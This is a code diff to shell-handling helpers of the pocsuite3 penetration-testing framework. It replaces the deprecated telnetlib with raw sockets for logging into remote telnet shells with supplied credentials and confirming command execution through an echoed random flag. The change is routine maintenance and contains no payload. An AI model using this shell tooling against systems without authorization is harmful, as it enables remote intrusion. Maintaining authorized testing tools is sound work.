@@ -4,7 +4,6 @@ import zlib
 import pickle
 import base64
 import select
-import telnetlib
 import threading
 from pocsuite3.lib.core.poc import POCBase
 from pocsuite3.lib.utils import random_str
@@ -25,25 +24,18 @@ def read_inputs(s):
     return b''.join(buffer)
 
 
+def read_until(conn, inputs):
+    try:
+        while True:
+            msg = conn.recv(1024).decode('utf-8', errors='ignore')
+            if inputs in msg.lower():
+                break
+    except Exception:
+        pass
+
+
 def read_results(conn, inputs):
-    if isinstance(conn, telnetlib.Telnet):
-        flag = random_str(6).encode()
-        inputs = inputs.strip() + b';' + flag + b'\n'
-        results = b''
-        conn.write(inputs)
-        count = 10
-        while count:
-            count -= 1
-            chunk = conn.read_until(random_str(6).encode(), 0.2)
-            if len(chunk) > 0:
-                results += chunk
-            if results.count(flag) >= 2:
-                # remove the Telnet input echo
-                results = results.split(inputs.strip())[-1]
-                results = os.linesep.encode().join(
-                    results.split(flag)[0].splitlines()[0:-1])
-                return results.strip() + b'\n'
-    elif callable(conn):
+    if callable(conn):
         results = conn(inputs.decode())
         if not isinstance(results, bytes):
             results = results.encode()
@@ -116,15 +108,16 @@ def bind_tcp_shell(host, port, check=True):
 
 
 def bind_telnet_shell(host, port, user, pwd, check=True):
+    # see https://peps.python.org/pep-0594/#telnetlib
     if not check_port(host, port):
         return False
     try:
-        tn = telnetlib.Telnet(host, port)
-        tn.expect([b'Login: ', b'login: '], 10)
-        tn.write(user.encode() + b'\n')
-        tn.expect([b'Password: ', b'password: '], 10)
-        tn.write(pwd.encode() + b'\n')
-        tn.write(b'\n')
+        tn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        tn.connect((host, port))
+        read_until(tn, 'login: ')
+        tn.sendall((user + "\n").encode('utf-8'))
+        read_until(tn, 'password: ')
+        tn.sendall((pwd + "\n").encode('utf-8'))
         if check:
             flag = random_str(6).encode()
             if flag not in read_results(tn, b'echo %s' % flag):
